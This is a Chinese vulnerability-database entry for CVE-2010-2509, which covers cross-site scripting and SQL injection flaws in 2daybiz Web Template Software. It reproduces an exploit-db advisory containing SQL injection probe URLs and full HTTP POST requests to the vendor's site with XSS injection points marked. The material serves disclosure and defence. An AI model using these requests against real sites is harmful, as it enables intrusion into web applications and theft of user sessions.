2daybiz Web Template Software多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119553 漏洞类型 跨站脚本
发布时间 2010-06-24 更新时间 2010-06-28
CVE编号 CVE-2010-2509 CNNVD-ID CNNVD-201006-448
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/14020
https://www.securityfocus.com/bid/73744
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-448
|漏洞详情
2daybizWebTemplateSoftware存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)category.php的keyword参数和(2)memberlogin.php的password参数注入任意的web脚本和HTML。
|漏洞EXP
$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz - The Web Template Software SQL injection and XSS vulnerability
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/webtemplatesoftware.html
$ Date :06/24/2010
$ Email :sangteamtham@gmail.com
$
$******************************************************************************************

1.SQL injection
http://server/customize.php?tid=[id]+[SQL]

2.XSS

2.a : search products module

Here is my header:

http://www.2daytemplates.com/category.php

POST /category.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4)
Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/category.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
category=0&product=0&keyword=[XSS
here]&itemno=ssss&templates_per_page=9&search=Search

2.b: Login module

http://www.2daytemplates.com/memberlogin.php

POST /memberlogin.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4)
Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/memberlogin.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
email=sangteamtham_hce%40ymail.com&password=[XSS Here]opage=&Submit=Login

XSS here such as:
">">

$******************************************************************************************
$Demo:
$ http://<server>/customize.php?tid=1314+and+1=1--
$ http://<server>/customize.php?tid=1314+and+1=0--
$
$
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------
|受影响的产品
2daybiz Web Template Software 0
|参考资料

来源:EXPLOIT-DB
名称:14020
链接:http://www.exploit-db.com/exploits/14020
来源:SECUNIA
名称:40348
链接:http://secunia.com/advisories/40348